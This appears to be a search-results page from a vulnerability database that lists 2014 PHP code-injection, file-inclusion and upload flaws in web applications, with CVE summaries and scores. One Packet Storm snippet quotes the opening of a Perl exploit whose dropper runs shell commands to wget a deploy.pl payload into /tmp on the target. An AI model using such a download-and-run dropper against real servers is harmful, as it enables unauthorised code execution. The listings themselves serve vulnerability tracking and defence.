7207 matches found

seebug.org
added 2014/07/01 12:0 a.m., 18 views

Active Collab "chat module" <= 2.3.8 - Remote PHP Code Injection Exploit

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...

AI score: 7.1 | Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 13 views

ovidentia 5.6.x/5.8 options.php babInstallPath Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/18232/info Ovidentia is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker can exploit these issues to include arbitrary remote files...

AI score: 7.1 | Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 21 views

Rama CMS <= 0.9.8 (download.php file) File Disclosure Vulnerability

No description provided by source. Start info: Script Name: Rama Zaitan Cms Script Project: http://sourceforge.net/project/showfiles.php?groupid=212495&packageid=255590 Download: http://sourceforge.net/project/downloading.php?groupid=212495&filename=cms975.zip&a=5782381 0.9.5 = Versions =0.9.8 by...

AI score: 7.1 | Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 19 views

FTP Drive + HTTP 1.0.4 iOS - Code Execution Vulnerability

No description provided by source. Document Title: =============== FTP Drive + HTTP 1.0.4 iOS - Code Execution Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1231 Release Date: ============= 2014-03-20 Vulnerability Laboratory ID VL-ID:...

AI score: 7.1 | Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 17 views

phpMyTourney 2 - tourney/index.php Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/28057/info phpMyTourney is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing maliciou...

AI score: 7.1 | Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 9 views

mcGuestbook 1.3 ecrire.php lang Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/18476/info mcGuestbook is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker can exploit these issues to include arbitrary remote file...

AI score: 7.1 | Exploits: 0

Packet Storm
added 2014/06/29 12:0 a.m., 63 views

Horde Framework Unserialize PHP Code Execution

ported from metasploit by irrlicht june 2014 modify dropper url and run use strict; use warnings; use LWP::UserAgent; use WWW::Mechanize; use MIME::Base64; if !$ARGV0 print "specify full login.php url\n"; exit; my $dropper = 'system"mkdir /tmp/\" \"; cd /tmp/\" \"; wget -O deploy.pl...

CVSS: 7.5 | AI score: 0.1 | EPSS: 0.8135 | Exploits: 7

seebug.org
added 2014/06/24 12:0 a.m., 39 views

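Apple CMS (苹果CMS) SQL injection: ignores GPC, ignores the built-in 360 protection script, ignores plenty more.. first round

Brief description: RTRT, just kidding. Details: First, let's look at the home page index.php location.href='install.php';';exit; require"inc/conn.php"; requireMACROOT.'/inc/common/360safe3.php';//Scary, 360 is built in, but it does not affect the injection later on $m = be'get','m';//This is escaped once here, but that does not affect us either ifstrpos$m,'.' $m = substr$m,0,strpos$m,'.'; $par = explode'-',$m; $parlen = count$par; $ac...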

AI score: 7 | Exploits: 0

Zero Science Lab
added 2014/06/21 12:0 a.m., 60 views

Lunar CMS 3.3 Unauthenticated Remote Command Execution Exploit

Summary Lunar CMS is a freely distributable open source content management system written for use on servers running the ever so popular PHP5 & MySQL. Description Lunar CMS suffers from an unauthenticated arbitrary command execution vulnerability. The issue is caused due to the improper...

AI score: 6.2 | Exploits: 0

NVD
added 2014/06/13 2:55 p.m., 12 views

CVE-2013-5352

Sharetronix 3.1.1.3, 3.1.1, and earlier allows remote attackers to execute arbitrary PHP code via the (1) activities_text parameter to services/activities/set or (2) comments_text parameter to services/comments/set, which is not properly handled when executing the preg_replace function with the e modifi...

CVSS: 6.8 | AI score: 7.7 | EPSS: 0.01028 | Exploits: 0 | References: 6

CVE
added 2014/06/13 2:0 p.m., 43 views

CVE-2013-5352

Sharetronix 3.1.1.3 and earlier versions are vulnerable to remote PHP code execution via the activities_text parameter to /services/activities/set or the comments_text parameter to /services/comments/set, caused by unsafe handling of the PHP preg_replace function with the /e modifier. The vulnera...

CVSS: 6.8 | AI score: 7.9 | EPSS: 0.01028 | Exploits: 0 | References: 6 | Affected Software: 1

ATTACKERKB
added 2014/06/13 12:0 a.m., 16 views

Sharetronix <= 3.1.1 Two PHP Code Injection Vulnerabilities

Sharetronix 3.1.1.3, 3.1.1, and earlier allows remote attackers to execute arbitrary PHP code via the (1) activities_text parameter to services/activities/set or (2) comments_text parameter to services/comments/set, which is not properly handled when executing the preg_replace function with the e...

CVSS: 6.8 | AI score: 2.2 | EPSS: 0.01028 | Exploits: 0 | References: 1

NVD
added 2014/06/11 2:55 p.m., 40 views

CVE-2014-3782

Multiple incomplete blacklist vulnerabilities in the filemanager::isFileExclude method in the Media Manager in Dotclear before 2.6.3 allow remote authenticated users to execute arbitrary PHP code by uploading a file with a (1) double extension or (2) .php5, (3) .phtml, or some other PHP file extension...

CVSS: 6 | AI score: 7.2 | EPSS: 0.00829 | Exploits: 2 | References: 6

Prion
added 2014/06/11 2:55 p.m., 23 views

Input validation

Multiple incomplete blacklist vulnerabilities in the filemanager::isFileExclude method in the Media Manager in Dotclear before 2.6.3 allow remote authenticated users to execute arbitrary PHP code by uploading a file with a (1) double extension or (2) .php5, (3) .phtml, or some other PHP file extension...

CVSS: 6 | AI score: 7.8 | EPSS: 0.00829 | Exploits: 2 | References: 6 | Affected Software: 1

UbuntuCve
added 2014/06/11 2:55 p.m., 30 views

CVE-2014-3782

Multiple incomplete blacklist vulnerabilities in the filemanager::isFileExclude method in the Media Manager in Dotclear before 2.6.3 allow remote authenticated users to execute arbitrary PHP code by uploading a file with a (1) double extension or (2) .php5, (3) .phtml, or some other PHP file extension...

CVSS: 6 | AI score: 6.2 | EPSS: 0.00829 | Exploits: 2 | References: 1

CVE
added 2014/06/11 2:0 p.m., 45 views

CVE-2014-3782

Summary: CVE-2014-3782 affects Dotclear

CVSS: 6 | AI score: 7.4 | EPSS: 0.00829 | Exploits: 2 | References: 6 | Affected Software: 1

htbridge
added 2014/06/11 12:0 a.m., 120 views

Unrestricted Upload of File with Dangerous Type in BoltWire

High-Tech Bridge Security Research Lab discovered vulnerability in BoltWire, which can be exploited to execute arbitrary PHP code on the target system and gain complete control over vulnerable web application. 1 Unrestricted Upload of File with Dangerous Type in BoltWire: CVE-2014-4169 The...

CVSS: 10 | AI score: 7.6 | Exploits: 1 | Affected Software: 1

NVD
added 2014/06/04 2:55 p.m., 16 views

CVE-2013-0204

settings/personal.php in ownCloud 4.5.x before 4.5.6 allows remote authenticated users to execute arbitrary PHP code via crafted mount point settings...

CVSS: 4.6 | AI score: 7.1 | EPSS: 0.0053 | Exploits: 0 | References: 1

Prion
added 2014/06/04 2:55 p.m., 17 views

Code injection

settings/personal.php in ownCloud 4.5.x before 4.5.6 allows remote authenticated users to execute arbitrary PHP code via crafted mount point settings...

CVSS: 4.6 | AI score: 7.7 | EPSS: 0.0053 | Exploits: 0 | References: 1 | Affected Software: 1

ATTACKERKB
added 2014/06/04 2:55 p.m., 4 views

CVE-2013-0204

settings/personal.php in ownCloud 4.5.x before 4.5.6 allows remote authenticated users to execute arbitrary PHP code via crafted mount point settings...

CVSS: 4.6 | AI score: 6.1 | EPSS: 0.0053 | Exploits: 0 | References: 3